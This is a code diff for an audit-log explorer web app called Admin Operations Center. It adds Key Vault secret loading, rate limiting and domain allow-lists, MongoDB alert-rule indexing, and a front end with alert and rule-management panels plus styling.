logger = structlog.get_logger("aoc.auth")
@@ -94,7 +98,9 @@ def user_can_access_privacy_services(claims: dict) -> bool:
def require_auth(authorization: str | None = Header(None)):
if not AUTH_ENABLED:
return {"sub": "anonymous"}
user = {"sub": "anonymous"}
_auth_context.set(user)
return user
if not authorization or not authorization.lower().startswith("bearer "):
raise HTTPException(status_code=401, detail="Missing bearer token")
@@ -106,4 +112,5 @@ def require_auth(authorization: str | None = Header(None)):
if not _allowed(claims, AUTH_ALLOWED_ROLES, AUTH_ALLOWED_GROUPS):
raise HTTPException(status_code=403, detail="Forbidden")
_auth_context.set(claims)
return claims

View File

@@ -1,4 +1,10 @@
from pydantic_settings import BaseSettings, SettingsConfigDict
from secrets_manager import load_key_vault_secrets
# Pre-load Azure Key Vault secrets into os.environ before pydantic-settings reads them.
# This is a no-op if AZURE_KEY_VAULT_NAME is not set.
load_key_vault_secrets()
from pydantic_settings import BaseSettings, SettingsConfigDict # noqa: E402
class Settings(BaseSettings):
@@ -60,6 +66,35 @@ class Settings(BaseSettings):
# Redis (caching + async job queue)
REDIS_URL: str = "redis://localhost:6379/0"
# UI defaults
DEFAULT_PAGE_SIZE: int = 24
# Alert notifications
ALERT_WEBHOOK_URL: str = ""
ALERT_WEBHOOK_FORMAT: str = "generic" # generic | slack | teams
ALERT_DEDUPE_MINUTES: int = 15
# Webhook security
WEBHOOK_CLIENT_SECRET: str = ""
# Rate limiting
RATE_LIMIT_ENABLED: bool = True
RATE_LIMIT_REQUESTS: int = 120
RATE_LIMIT_WINDOW_SECONDS: int = 60
# Security / docs exposure
DOCS_ENABLED: bool = False
METRICS_ALLOWED_IPS: str = "127.0.0.1,::1,10.0.0.0/8,172.16.0.0/12,192.168.0.0/16"
# LLM endpoint restriction (comma-separated domains, e.g. "api.openai.com,*.openai.azure.com")
LLM_ALLOWED_DOMAINS: str = ""
# SIEM webhook restriction (comma-separated domains)
SIEM_ALLOWED_DOMAINS: str = ""
# Optional Azure Key Vault integration for secrets
AZURE_KEY_VAULT_NAME: str = ""
_settings = Settings()
@@ -100,3 +135,22 @@ PRIVACY_SENSITIVE_OPERATIONS = {o.strip() for o in _settings.PRIVACY_SENSITIVE_O
PRIVACY_SERVICE_ROLES = {r.strip() for r in _settings.PRIVACY_SERVICE_ROLES.split(",") if r.strip()}
REDIS_URL = _settings.REDIS_URL
DEFAULT_PAGE_SIZE = _settings.DEFAULT_PAGE_SIZE
ALERT_WEBHOOK_URL = _settings.ALERT_WEBHOOK_URL
ALERT_WEBHOOK_FORMAT = _settings.ALERT_WEBHOOK_FORMAT
ALERT_DEDUPE_MINUTES = _settings.ALERT_DEDUPE_MINUTES
WEBHOOK_CLIENT_SECRET = _settings.WEBHOOK_CLIENT_SECRET
RATE_LIMIT_ENABLED = _settings.RATE_LIMIT_ENABLED
RATE_LIMIT_REQUESTS = _settings.RATE_LIMIT_REQUESTS
RATE_LIMIT_WINDOW_SECONDS = _settings.RATE_LIMIT_WINDOW_SECONDS
DOCS_ENABLED = _settings.DOCS_ENABLED
METRICS_ALLOWED_IPS = _settings.METRICS_ALLOWED_IPS
LLM_ALLOWED_DOMAINS = [d.strip().lower() for d in _settings.LLM_ALLOWED_DOMAINS.split(",") if d.strip()]
SIEM_ALLOWED_DOMAINS = [d.strip().lower() for d in _settings.SIEM_ALLOWED_DOMAINS.split(",") if d.strip()]
AZURE_KEY_VAULT_NAME = _settings.AZURE_KEY_VAULT_NAME

View File

@@ -8,9 +8,24 @@ client = MongoClient(MONGO_URI or "mongodb://localhost:27017")
db = client[DB_NAME]
events_collection = db["events"]
saved_searches_collection = db["saved_searches"]
alerts_collection = db["alerts"]
logger = structlog.get_logger("aoc.database")
def _dedupe_alert_rules():
"""Remove duplicate alert_rules by name, keeping the oldest document."""
try:
pipeline = [
{"$sort": {"_id": ASCENDING}},
{"$group": {"_id": "$name", "first_id": {"$first": "$_id"}}},
]
seen = {doc["_id"]: doc["first_id"] for doc in db["alert_rules"].aggregate(pipeline)}
for name, keep_id in seen.items():
db["alert_rules"].delete_many({"name": name, "_id": {"$ne": keep_id}})
except Exception:
pass # Collection may not exist yet
def setup_indexes(max_retries: int = 5, delay: float = 2.0):
"""Ensure MongoDB indexes exist. Retries on connection errors."""
from time import sleep
@@ -22,6 +37,8 @@ def setup_indexes(max_retries: int = 5, delay: float = 2.0):
events_collection.create_index([("service", ASCENDING), ("timestamp", DESCENDING)])
events_collection.create_index("id")
saved_searches_collection.create_index([("created_by", ASCENDING), ("created_at", DESCENDING)])
_dedupe_alert_rules()
db["alert_rules"].create_index("name", unique=True)
events_collection.create_index(
[("actor_display", TEXT), ("raw_text", TEXT), ("operation", TEXT)],
name="text_search_index",

View File

@@ -4,28 +4,63 @@
<meta charset="UTF-8" />
<meta name="viewport" content="width=device-width, initial-scale=1.0" />
<title>Admin Operations Center</title>
<link rel="stylesheet" href="/style.css?v=8" />
<script defer src="https://cdn.jsdelivr.net/npm/alpinejs@3.x.x/dist/cdn.min.js"></script>
<script src="https://alcdn.msauth.net/browser/2.37.0/js/msal-browser.min.js" crossorigin="anonymous"></script>
<link rel="stylesheet" href="/style.css?v=15" />
<script defer src="https://cdn.jsdelivr.net/npm/alpinejs@3.x.x/dist/cdn.min.js" integrity="sha384-WPtu0YHhJ3arcykfnv1JgUffWDSKRnqnDeTpJUbOc2os2moEmLkIdaeR0trPN4be" crossorigin="anonymous"></script>
<script src="https://alcdn.msauth.net/browser/2.37.0/js/msal-browser.min.js" integrity="sha384-DUSOaqAzlZRiZxkDi8hL7hXJDZ+X39ZOAYV9ZDx44gUv9pozmcunJH02tjSFLPnW" crossorigin="anonymous"></script>
</head>
<body>
<div class="page" x-data="aocApp()" x-init="initApp()">
<nav class="topbar">
<div class="topbar__brand">
<span class="topbar__logo">🔍</span>
<span class="topbar__name">AOC</span>
<span class="version-badge" x-text="appVersion"></span>
</div>
<div class="topbar__links">
<a :href="repoUrl" target="_blank" rel="noopener">Repository</a>
<a :href="docsUrl" target="_blank" rel="noopener">Docs</a>
</div>
<div class="topbar__meta">
<template x-if="account">
<div class="user-chip">
<div class="user-avatar" x-text="(account.name || account.username || '?').charAt(0).toUpperCase()"></div>
<div class="user-details">
<span class="user-name" x-text="account.name || account.username || ''"></span>
<span class="user-email" x-text="account.username || ''"></span>
</div>
</div>
</template>
<template x-if="!account && authConfig?.auth_enabled">
<span class="login-hint">Not signed in</span>
</template>
</div>
<div class="topbar__actions">
<button id="fetchBtn" class="ghost btn--compact" aria-label="Fetch latest audit logs" @click="fetchLogs()">Fetch</button>
<button id="refreshBtn" class="ghost btn--compact" aria-label="Refresh events" @click="loadEvents(currentCursor)">Refresh</button>
<button id="authBtn" class="ghost btn--compact" aria-label="Login" x-text="authBtnText" @click="toggleAuth()"></button>
</div>
</nav>
<header class="hero">
<div>
<p class="eyebrow">Admin Operations Center <span class="version-badge" x-text="appVersion"></span></p>
<p class="eyebrow">Admin Operations Center</p>
<h1>Audit Log Explorer</h1>
<p class="lede">Search and review Microsoft audit events from Entra, Intune, Exchange, SharePoint, and Teams.</p>
</div>
<div class="cta">
<button id="authBtn" class="ghost" aria-label="Login" x-text="authBtnText" @click="toggleAuth()"></button>
<button id="fetchBtn" aria-label="Fetch latest audit logs" @click="fetchLogs()">Fetch new</button>
<button id="refreshBtn" aria-label="Refresh events" @click="loadEvents(currentCursor)">Refresh</button>
<div class="alert-summary" x-show="alertSummary.total_open > 0">
<div class="alert-badge alert-badge--high" x-show="alertSummary.high > 0" x-text="alertSummary.high"></div>
<div class="alert-badge alert-badge--medium" x-show="alertSummary.medium > 0" x-text="alertSummary.medium"></div>
<div class="alert-badge alert-badge--low" x-show="alertSummary.low > 0" x-text="alertSummary.low"></div>
<span class="alert-label">open alerts</span>
</div>
</header>
<section class="panel">
<h3>Source Health</h3>
<div class="source-health">
<div class="panel-header panel-header--collapsible" @click="togglePanel('sourceHealth')">
<h3>Source Health</h3>
<span class="panel-toggle" :class="panelState.sourceHealth ? 'panel-toggle--open' : ''"></span>
</div>
<div x-show="panelState.sourceHealth">
<template x-for="src in sourceHealth" :key="src.source">
<div class="health-card">
<strong x-text="src.source"></strong>
@@ -39,7 +74,160 @@
</section>
<section class="panel">
<form id="filters" class="filters" @submit.prevent="resetPagination(); loadEvents()">
<div class="panel-header panel-header--collapsible" @click="togglePanel('alerts')">
<h3>Alerts</h3>
<div style="display:flex;align-items:center;gap:10px;">
<span x-text="`${alertSummary.total_open} open`" class="alert-open-count"></span>
<span class="panel-toggle" :class="panelState.alerts ? 'panel-toggle--open' : ''"></span>
</div>
</div>
<div x-show="panelState.alerts">
<div class="alert-filters">
<select x-model="alertsFilter.status" @change="alertsPage = 1; loadAlerts()">
<option value="">All statuses</option>
<option value="open">Open</option>
<option value="acknowledged">Acknowledged</option>
<option value="resolved">Resolved</option>
<option value="false_positive">False Positive</option>
</select>
<select x-model="alertsFilter.severity" @change="alertsPage = 1; loadAlerts()">
<option value="">All severities</option>
<option value="high">High</option>
<option value="medium">Medium</option>
<option value="low">Low</option>
</select>
</div>
<div class="alerts-list" x-show="alerts.length > 0">
<template x-for="alert in alerts" :key="alert._id || alert.event_id">
<div class="alert-card" :class="'alert-card--' + alert.severity">
<div class="alert-card__meta">
<span class="pill" :class="alert.severity === 'high' ? 'pill--err' : (alert.severity === 'medium' ? 'pill--warn' : '')" x-text="alert.severity"></span>
<span class="pill" x-text="alert.status"></span>
<small x-text="new Date(alert.timestamp).toLocaleString()"></small>
</div>
<strong x-text="alert.rule_name"></strong>
<p x-text="alert.message"></p>
<div class="alert-card__actions">
<button type="button" class="ghost btn--compact" @click="updateAlertStatus(alert._id, 'acknowledged')" x-show="alert.status === 'open'">Acknowledge</button>
<button type="button" class="ghost btn--compact" @click="updateAlertStatus(alert._id, 'resolved')" x-show="alert.status !== 'resolved' && alert.status !== 'false_positive'">Resolve</button>
<button type="button" class="ghost btn--compact" @click="updateAlertStatus(alert._id, 'false_positive')" x-show="alert.status !== 'false_positive'">False Positive</button>
<button type="button" class="ghost btn--compact" @click="updateAlertStatus(alert._id, 'open')" x-show="alert.status !== 'open'">Reopen</button>
</div>
</div>
</template>
</div>
<div class="alerts-empty" x-show="alerts.length === 0">
<p>No alerts match the current filters. Alerts appear here when rules trigger during event ingestion.</p>
</div>
<div class="pagination" x-show="alertsTotal > 20">
<button type="button" :disabled="alertsPage === 1" @click="alertsPage--; loadAlerts()">Prev</button>
<span x-text="`Page ${alertsPage}`"></span>
<button type="button" :disabled="alertsPage * 20 >= alertsTotal" @click="alertsPage++; loadAlerts()">Next</button>
</div>
</div>
</section>
<section class="panel">
<div class="panel-header panel-header--collapsible" @click="togglePanel('rules')">
<h3>Alert Rules</h3>
<div style="display:flex;align-items:center;gap:10px;">
<button type="button" class="btn--compact" @click.stop="openRuleEditor()">+ Add rule</button>
<span class="panel-toggle" :class="panelState.rules ? 'panel-toggle--open' : ''"></span>
</div>
</div>
<div x-show="panelState.rules">
<div class="rules-list">
<template x-for="rule in rules" :key="rule.id">
<div class="rule-card" :class="rule.enabled ? '' : 'rule-card--disabled'">
<div class="rule-card__meta">
<span class="pill" :class="rule.severity === 'high' ? 'pill--err' : (rule.severity === 'medium' ? 'pill--warn' : '')" x-text="rule.severity"></span>
<label class="toggle-label">
<input type="checkbox" :checked="rule.enabled" @change="toggleRule(rule.id, $event.target.checked)">
<span x-text="rule.enabled ? 'On' : 'Off'"></span>
</label>
</div>
<strong x-text="rule.name"></strong>
<p x-text="rule.message"></p>
<div class="rule-card__conditions">
<template x-for="(cond, idx) in rule.conditions" :key="idx">
<span class="pill pill--tag" x-text="`${cond.field} ${cond.op} ${cond.value}`"></span>
</template>
</div>
<div class="rule-card__actions">
<button type="button" class="ghost btn--compact" @click="openRuleEditor(rule)">Edit</button>
<button type="button" class="ghost btn--compact" @click="deleteRule(rule.id)">Delete</button>
</div>
</div>
</template>
</div>
<div class="rules-empty" x-show="rules.length === 0">
<p>No custom rules yet. Pre-built admin-ops rules are active by default. Add your own rules to detect specific patterns.</p>
</div>
</div>
<div id="ruleModal" class="modal hidden" role="dialog" aria-modal="true" :class="{ 'hidden': !ruleModalOpen }">
<div class="modal__content" style="max-width: 600px;">
<div class="modal__header">
<h3 x-text="ruleEditId ? 'Edit Rule' : 'New Rule'"></h3>
<button type="button" class="ghost" @click="ruleModalOpen = false">Close</button>
</div>
<form class="rule-form" @submit.prevent="saveRule()">
<label>
Name
<input type="text" x-model="ruleEdit.name" placeholder="e.g. Failed CA Policy" required />
</label>
<label>
Severity
<select x-model="ruleEdit.severity">
<option value="low">Low</option>
<option value="medium">Medium</option>
<option value="high">High</option>
</select>
</label>
<label>
Message
<textarea x-model="ruleEdit.message" placeholder="What should the alert say?" rows="2"></textarea>
</label>
<div class="rule-conditions">
<span>Conditions (all must match)</span>
<template x-for="(cond, idx) in ruleEdit.conditions" :key="idx">
<div class="condition-row">
<input type="text" x-model="cond.field" placeholder="field" list="ruleFieldOptions" required />
<select x-model="cond.op">
<option value="eq">equals</option>
<option value="neq">not equals</option>
<option value="contains">contains</option>
<option value="in">in list</option>
<option value="after_hours">after hours</option>
</select>
<input type="text" x-model="cond.value" placeholder="value" :required="cond.op !== 'after_hours'" />
<button type="button" class="ghost btn--compact" @click="ruleEdit.conditions.splice(idx, 1)"></button>
</div>
</template>
<button type="button" class="ghost btn--compact" @click="ruleEdit.conditions.push({field:'', op:'eq', value:''})">+ Add condition</button>
</div>
<datalist id="ruleFieldOptions">
<option value="service"></option>
<option value="operation"></option>
<option value="result"></option>
<option value="actor_display"></option>
<option value="timestamp"></option>
</datalist>
<div class="rule-form__actions">
<button type="submit">Save</button>
<button type="button" class="ghost" @click="ruleModalOpen = false">Cancel</button>
</div>
</form>
</div>
</div>
</section>
<section class="panel">
<div class="panel-header panel-header--collapsible" @click="togglePanel('filters')">
<h3>Filters</h3>
<span class="panel-toggle" :class="panelState.filters ? 'panel-toggle--open' : ''"></span>
</div>
<form id="filters" class="filters" @submit.prevent="resetPagination(); loadEvents()" x-show="panelState.filters">
<div class="filter-row">
<label>
User (name/UPN)
@@ -133,8 +321,11 @@
</section>
<section class="panel" x-show="aiFeaturesEnabled">
<h3>Ask a question</h3>
<form class="ask-form" @submit.prevent="askQuestion()">
<div class="panel-header panel-header--collapsible" @click="togglePanel('ask')">
<h3>Ask a question</h3>
<span class="panel-toggle" :class="panelState.ask ? 'panel-toggle--open' : ''"></span>
</div>
<form class="ask-form" @submit.prevent="askQuestion()" x-show="panelState.ask">
<div class="ask-row">
<input
type="text"
@@ -158,8 +349,8 @@
<template x-for="(evt, idx) in askEvents" :key="evt.id || idx">
<article class="event event--compact">
<div class="event__meta">
<span class="pill" x-text="evt.display_category || evt.service || '—'"></span>
<span class="pill" :class="['success','succeeded','ok','passed','true'].includes((evt.result || '').toLowerCase()) ? 'pill--ok' : 'pill--warn'" x-text="evt.result || '—'"></span>
<span class="pill pill--clickable" x-text="evt.display_category || evt.service || '—'" @click="filterByService(evt.service || evt.display_category)" title="Filter by this service"></span>
<span class="pill pill--clickable" :class="['success','succeeded','ok','passed','true'].includes((evt.result || '').toLowerCase()) ? 'pill--ok' : 'pill--warn'" x-text="evt.result || '—'" @click="filterByResult(evt.result)" title="Filter by this result"></span>
</div>
<h3 x-text="evt.operation || '—'"></h3>
<p class="event__detail" x-show="evt.display_summary"><strong>Summary:</strong> <span x-text="evt.display_summary"></span></p>
@@ -176,17 +367,21 @@
</section>
<section class="panel">
<div class="panel-header">
<div class="panel-header panel-header--collapsible" @click="togglePanel('events')">
<h2>Events</h2>
<span id="count" x-text="countText"></span>
<div style="display:flex;align-items:center;gap:10px;">
<span id="count" x-text="countText"></span>
<span class="panel-toggle" :class="panelState.events ? 'panel-toggle--open' : ''"></span>
</div>
</div>
<div id="status" class="status" aria-live="polite" x-text="statusText"></div>
<div x-show="panelState.events">
<div id="status" class="status" aria-live="polite" x-text="statusText"></div>
<div id="events" class="events">
<template x-for="(evt, idx) in events" :key="evt._id || evt.id || idx">
<article class="event">
<div class="event__meta">
<span class="pill" x-text="evt.display_category || evt.service || '—'"></span>
<span class="pill" :class="['success','succeeded','ok','passed','true'].includes((evt.result || '').toLowerCase()) ? 'pill--ok' : 'pill--warn'" x-text="evt.result || '—'"></span>
<span class="pill pill--clickable" x-text="evt.display_category || evt.service || '—'" @click="filterByService(evt.service || evt.display_category)" title="Filter by this service"></span>
<span class="pill pill--clickable" :class="['success','succeeded','ok','passed','true'].includes((evt.result || '').toLowerCase()) ? 'pill--ok' : 'pill--warn'" x-text="evt.result || '—'" @click="filterByResult(evt.result)" title="Filter by this result"></span>
</div>
<h3 x-text="evt.operation || '—'"></h3>
<p class="event__detail" x-show="evt.display_summary"><strong>Summary:</strong> <span x-text="evt.display_summary"></span></p>
@@ -220,6 +415,7 @@
<span x-text="`Page ${cursorStack.length + 1}`"></span>
<button type="button" id="nextPage" :disabled="!nextCursor" @click="goNext()">Next</button>
</div>
</div>
</section>
<div id="modal" class="modal hidden" role="dialog" aria-modal="true" aria-labelledby="modalTitle" :class="{ 'hidden': !modalOpen }">
@@ -239,6 +435,21 @@
<pre id="modalBody" x-text="modalBody"></pre>
</div>
</div>
<footer class="footer">
<div class="footer__left">
<span class="footer__brand">Admin Operations Center</span>
<span class="footer__version" x-text="'v' + appVersion"></span>
</div>
<div class="footer__center">
<a :href="repoUrl + '/issues/new'" target="_blank" rel="noopener">🐛 Report an issue</a>
<a :href="repoUrl" target="_blank" rel="noopener">💻 Source code</a>
<a :href="docsUrl" target="_blank" rel="noopener">📖 Documentation</a>
</div>
<div class="footer__right">
<span>Built with ❤️ by CQRE.NET</span>
</div>
</footer>
</div>
<script>
@@ -264,12 +475,24 @@
accessToken: null,
authScopes: [],
filters: {
actor: '', selectedServices: [], search: '', operation: '', result: '', start: '', end: '', limit: 100, includeTags: '', excludeTags: '',
actor: '', selectedServices: [], search: '', operation: '', result: '', start: '', end: '', limit: 24, includeTags: '', excludeTags: '',
},
panelState: { sourceHealth: true, alerts: true, rules: true, filters: true, ask: true, events: true },
options: { actors: [], services: [], operations: [], results: [] },
savedSearches: [],
appVersion: '',
repoUrl: 'https://git.cqre.net/cqrenet/aoc',
docsUrl: 'https://git.cqre.net/cqrenet/aoc/src/branch/main/README.md',
aiFeaturesEnabled: true,
alertSummary: { total_open: 0, high: 0, medium: 0, low: 0 },
alerts: [],
alertsTotal: 0,
alertsPage: 1,
alertsFilter: { status: 'open', severity: '' },
rules: [],
ruleModalOpen: false,
ruleEditId: null,
ruleEdit: { name: '', enabled: true, severity: 'medium', message: '', conditions: [] },
askQuestionText: '',
askLoading: false,
askAnswer: '',
@@ -282,10 +505,14 @@
await this.loadVersion();
await this.initAuth();
this.loadSavedFilters();
this.loadPanelState();
if (!this.authConfig?.auth_enabled || this.accessToken) {
await this.loadFilterOptions();
await this.loadSavedSearches();
await this.loadSourceHealth();
await this.loadAlertSummary();
await this.loadAlerts();
await this.loadRules();
await this.loadEvents();
}
},
@@ -308,12 +535,33 @@
} catch {}
},
loadPanelState() {
try {
const saved = localStorage.getItem('aoc_panels');
if (saved) {
const parsed = JSON.parse(saved);
Object.keys(parsed).forEach((k) => { if (this.panelState[k] !== undefined) this.panelState[k] = parsed[k]; });
}
} catch {}
},
savePanelState() {
try {
localStorage.setItem('aoc_panels', JSON.stringify(this.panelState));
} catch {}
},
togglePanel(key) {
this.panelState[key] = !this.panelState[key];
this.savePanelState();
},
async loadVersion() {
try {
const res = await fetch('/api/version');
if (res.ok) {
const body = await res.json();
this.appVersion = body.version || '';
this.appVersion = (body.version || '').replace(/^v/, '');
}
} catch {}
},
@@ -343,9 +591,15 @@
async initAuth() {
try {
const res = await fetch('/api/config/auth');
this.authConfig = await res.json();
} catch {
this.authConfig = { auth_enabled: false };
if (!res.ok) {
console.error('Auth config fetch failed:', res.status, res.statusText);
this.authConfig = { auth_enabled: false, _error: res.status };
} else {
this.authConfig = await res.json();
}
} catch (err) {
console.error('Auth config fetch error:', err);
this.authConfig = { auth_enabled: false, _error: 'network' };
}
try {
@@ -353,6 +607,11 @@
if (featRes.ok) {
const featBody = await featRes.json();
this.aiFeaturesEnabled = featBody.ai_features_enabled !== false;
if (featBody.default_page_size) {
this.filters.limit = featBody.default_page_size;
} else {
this.filters.limit = 24;
}
} else {
this.aiFeaturesEnabled = true;
}
@@ -361,7 +620,17 @@
}
if (!this.authConfig?.auth_enabled) {
this.authBtnText = '';
this.authBtnText = 'Auth: OFF';
console.warn('AOC auth is disabled. Set AUTH_ENABLED=true in .env to enable login.');
return;
}
const tenantId = this.authConfig.tenant_id;
const clientId = this.authConfig.client_id;
if (!clientId || !tenantId) {
this.authBtnText = 'Auth: misconfigured';
this.statusText = 'Auth is enabled but client_id or tenant_id is missing. Check .env configuration.';
console.error('AOC auth misconfigured: missing client_id or tenant_id in /api/config/auth');
return;
}
@@ -370,8 +639,6 @@
return;
}
const tenantId = this.authConfig.tenant_id;
const clientId = this.authConfig.client_id;
const baseScope = this.authConfig.scope || "";
this.authScopes = Array.from(new Set(['openid', 'profile', 'email', ...baseScope.split(/[ ,]+/).filter(Boolean)]));
const authority = `https://login.microsoftonline.com/${tenantId}`;
@@ -521,9 +788,8 @@
const saved = localStorage.getItem('aoc_filters');
if (!saved && this.options.services.length) {
// Default: exclude noisy high-volume services
const noisy = ['Exchange', 'SharePoint', 'Teams'];
this.filters.selectedServices = this.options.services.filter((s) => !noisy.includes(s));
// Default: show all services (privacy controls handle exclusions server-side)
this.filters.selectedServices = [...this.options.services];
} else if (saved) {
try {
const parsed = JSON.parse(saved);
@@ -617,13 +883,137 @@
},
clearFilters() {
const noisy = ['Exchange', 'SharePoint', 'Teams'];
this.filters = { actor: '', selectedServices: this.options.services.filter((s) => !noisy.includes(s)), search: '', operation: '', result: '', start: '', end: '', limit: 100, includeTags: '', excludeTags: '' };
this.filters = { actor: '', selectedServices: [...this.options.services], search: '', operation: '', result: '', start: '', end: '', limit: 24, includeTags: '', excludeTags: '' };
this.saveFilters();
this.resetPagination();
this.loadEvents();
},
filterByService(service) {
if (!service) return;
this.filters.selectedServices = [service];
this.saveFilters();
this.resetPagination();
this.loadEvents();
},
filterByResult(result) {
if (!result) return;
this.filters.result = this.filters.result === result ? '' : result;
this.saveFilters();
this.resetPagination();
this.loadEvents();
},
async loadAlertSummary() {
try {
const res = await fetch('/api/alerts/summary', { headers: this.authHeader() });
if (!res.ok) return;
const body = await res.json();
this.alertSummary.total_open = body.total_open || 0;
const sev = body.by_status_severity || [];
this.alertSummary.high = sev.filter((s) => s._id.severity === 'high' && s._id.status === 'open').reduce((a, b) => a + b.count, 0);
this.alertSummary.medium = sev.filter((s) => s._id.severity === 'medium' && s._id.status === 'open').reduce((a, b) => a + b.count, 0);
this.alertSummary.low = sev.filter((s) => s._id.severity === 'low' && s._id.status === 'open').reduce((a, b) => a + b.count, 0);
} catch {}
},
async loadAlerts() {
try {
const params = new URLSearchParams();
params.append('page_size', '20');
params.append('page', String(this.alertsPage));
if (this.alertsFilter.status) params.append('status', this.alertsFilter.status);
if (this.alertsFilter.severity) params.append('severity', this.alertsFilter.severity);
const res = await fetch(`/api/alerts?${params.toString()}`, { headers: this.authHeader() });
if (!res.ok) return;
const body = await res.json();
this.alerts = body.items || [];
this.alertsTotal = body.total || 0;
} catch {}
},
async updateAlertStatus(alertId, status) {
try {
const res = await fetch(`/api/alerts/${alertId}/status`, {
method: 'PATCH',
headers: { 'Content-Type': 'application/json', ...this.authHeader() },
body: JSON.stringify({ status }),
});
if (res.ok) {
await this.loadAlerts();
await this.loadAlertSummary();
}
} catch {}
},
async loadRules() {
try {
const res = await fetch('/api/rules', { headers: this.authHeader() });
if (!res.ok) return;
this.rules = await res.json();
} catch {}
},
openRuleEditor(rule) {
if (rule) {
this.ruleEditId = rule.id;
this.ruleEdit = {
name: rule.name,
enabled: rule.enabled,
severity: rule.severity,
message: rule.message,
conditions: JSON.parse(JSON.stringify(rule.conditions)),
};
} else {
this.ruleEditId = null;
this.ruleEdit = { name: '', enabled: true, severity: 'medium', message: '', conditions: [] };
}
this.ruleModalOpen = true;
},
async saveRule() {
const payload = { ...this.ruleEdit };
try {
const url = this.ruleEditId ? `/api/rules/${this.ruleEditId}` : '/api/rules';
const method = this.ruleEditId ? 'PUT' : 'POST';
const res = await fetch(url, {
method,
headers: { 'Content-Type': 'application/json', ...this.authHeader() },
body: JSON.stringify(payload),
});
if (!res.ok) throw new Error(await res.text());
this.ruleModalOpen = false;
await this.loadRules();
} catch (err) {
alert('Failed to save rule: ' + err.message);
}
},
async toggleRule(ruleId, enabled) {
try {
const rule = this.rules.find((r) => r.id === ruleId);
if (!rule) return;
const res = await fetch(`/api/rules/${ruleId}`, {
method: 'PUT',
headers: { 'Content-Type': 'application/json', ...this.authHeader() },
body: JSON.stringify({ ...rule, enabled }),
});
if (res.ok) await this.loadRules();
} catch {}
},
async deleteRule(ruleId) {
if (!confirm('Delete this rule?')) return;
try {
const res = await fetch(`/api/rules/${ruleId}`, {
method: 'DELETE',
headers: this.authHeader(),
});
if (res.ok) await this.loadRules();
} catch {}
},
async askQuestion() {
const q = this.askQuestionText.trim();
if (!q) return;
@@ -884,5 +1274,6 @@
};
}
</script>
</body>
</html>

View File

@@ -28,7 +28,115 @@ body {
.page {
max-width: 1100px;
margin: 0 auto;
padding: 32px 20px 60px;
padding: 0 20px 40px;
display: flex;
flex-direction: column;
min-height: 100vh;
}
.topbar {
display: flex;
align-items: center;
gap: 16px;
padding: 12px 0;
margin-bottom: 8px;
border-bottom: 1px solid var(--border);
flex-wrap: wrap;
}
.topbar__brand {
display: flex;
align-items: center;
gap: 8px;
font-weight: 700;
font-size: 16px;
}
.topbar__logo {
font-size: 20px;
}
.topbar__links {
display: flex;
gap: 16px;
margin-right: auto;
}
.topbar__links a {
color: var(--muted);
font-size: 13px;
text-decoration: none;
font-weight: 500;
transition: color 0.15s ease;
}
.topbar__links a:hover {
color: var(--accent-strong);
}
.topbar__meta {
display: flex;
align-items: center;
gap: 10px;
}
.user-chip {
display: flex;
align-items: center;
gap: 8px;
background: rgba(255, 255, 255, 0.04);
border: 1px solid var(--border);
border-radius: 999px;
padding: 4px 12px 4px 4px;
}
.user-avatar {
width: 26px;
height: 26px;
border-radius: 50%;
background: linear-gradient(135deg, var(--accent), var(--accent-strong));
color: #0b1220;
font-size: 12px;
font-weight: 700;
display: flex;
align-items: center;
justify-content: center;
flex-shrink: 0;
}
.user-details {
display: flex;
flex-direction: column;
line-height: 1.2;
}
.user-name {
font-size: 12px;
font-weight: 600;
color: var(--text);
}
.user-email {
font-size: 11px;
color: var(--muted);
}
.login-hint {
font-size: 12px;
color: var(--muted);
font-style: italic;
}
.topbar__actions {
display: flex;
gap: 8px;
align-items: center;
}
.btn--compact {
padding: 8px 14px;
font-size: 13px;
border-radius: 8px;
}
.hero {
@@ -37,6 +145,7 @@ body {
justify-content: space-between;
gap: 16px;
margin-bottom: 20px;
padding-top: 16px;
}
.eyebrow {
@@ -165,6 +274,31 @@ input {
margin-bottom: 8px;
}
.panel-header--collapsible {
cursor: pointer;
user-select: none;
padding: 4px 0;
margin-bottom: 0;
}
.panel-header--collapsible:hover {
opacity: 0.85;
}
.panel-toggle {
display: inline-block;
font-size: 14px;
color: var(--muted);
transition: transform 0.2s ease;
transform: rotate(-90deg);
width: 16px;
text-align: center;
}
.panel-toggle--open {
transform: rotate(0deg);
}
#count {
color: var(--muted);
font-size: 14px;
@@ -246,6 +380,27 @@ input {
border-color: rgba(239, 68, 68, 0.5);
}
.pill--clickable {
cursor: pointer;
transition: transform 0.1s ease, box-shadow 0.15s ease, background 0.15s ease;
}
.pill--clickable:hover {
transform: translateY(-1px);
box-shadow: 0 2px 8px rgba(125, 211, 252, 0.2);
background: rgba(125, 211, 252, 0.2);
}
.pill--clickable.pill--ok:hover {
box-shadow: 0 2px 8px rgba(34, 197, 94, 0.2);
background: rgba(34, 197, 94, 0.25);
}
.pill--clickable.pill--warn:hover {
box-shadow: 0 2px 8px rgba(249, 115, 22, 0.2);
background: rgba(249, 115, 22, 0.25);
}
.event h3 {
margin: 0 0 6px;
font-size: 17px;
@@ -508,7 +663,321 @@ input {
gap: 4px;
}
.footer {
margin-top: auto;
padding: 20px 0;
border-top: 1px solid var(--border);
display: flex;
align-items: center;
justify-content: space-between;
gap: 16px;
flex-wrap: wrap;
font-size: 13px;
color: var(--muted);
}
.footer__left {
display: flex;
align-items: center;
gap: 10px;
}
.footer__brand {
font-weight: 600;
color: var(--text);
}
.footer__version {
font-size: 11px;
padding: 2px 8px;
border-radius: 999px;
background: rgba(125, 211, 252, 0.1);
border: 1px solid rgba(125, 211, 252, 0.2);
color: var(--accent-strong);
}
.footer__center {
display: flex;
gap: 16px;
align-items: center;
}
.footer__center a {
color: var(--muted);
text-decoration: none;
transition: color 0.15s ease;
}
.footer__center a:hover {
color: var(--accent-strong);
}
.footer__right {
font-size: 12px;
}
/* Alert summary in hero */
.alert-summary {
display: flex;
align-items: center;
gap: 6px;
background: rgba(255, 255, 255, 0.04);
border: 1px solid var(--border);
border-radius: 999px;
padding: 6px 14px;
}
.alert-badge {
min-width: 22px;
height: 22px;
border-radius: 999px;
display: flex;
align-items: center;
justify-content: center;
font-size: 11px;
font-weight: 700;
color: #0b1220;
}
.alert-badge--high {
background: #ef4444;
}
.alert-badge--medium {
background: #f97316;
}
.alert-badge--low {
background: #3b82f6;
}
.alert-label {
font-size: 12px;
color: var(--muted);
}
.alert-open-count {
font-size: 13px;
color: var(--muted);
}
.alert-filters {
display: flex;
gap: 10px;
margin-bottom: 12px;
}
.alert-filters select {
padding: 8px 12px;
border-radius: 8px;
